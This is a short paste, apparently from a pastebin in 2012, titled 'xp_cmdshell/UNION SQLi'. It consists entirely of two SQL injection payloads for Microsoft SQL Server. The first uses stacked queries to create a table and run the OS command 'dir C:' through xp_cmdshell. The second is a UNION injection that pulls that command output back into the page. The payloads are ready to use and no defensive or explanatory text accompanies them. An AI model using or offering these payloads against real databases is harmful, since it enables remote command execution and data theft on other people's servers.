xp_cmdshell/UNION SQLi

stamparm Jun 20th, 2012 358 Never
  1. 1) executing xp_cmdshell
  2.';IF object_id('result') IS NOT NULL DROP TABLE result; CREATE TABLE result (output varchar(200));INSERT INTO result EXEC xp_cmdshell 'dir C:'--
  4. 2) result retrieval through UNION injection
  5.' UNION ALL SELECT NULL, NULL, output FROM result--
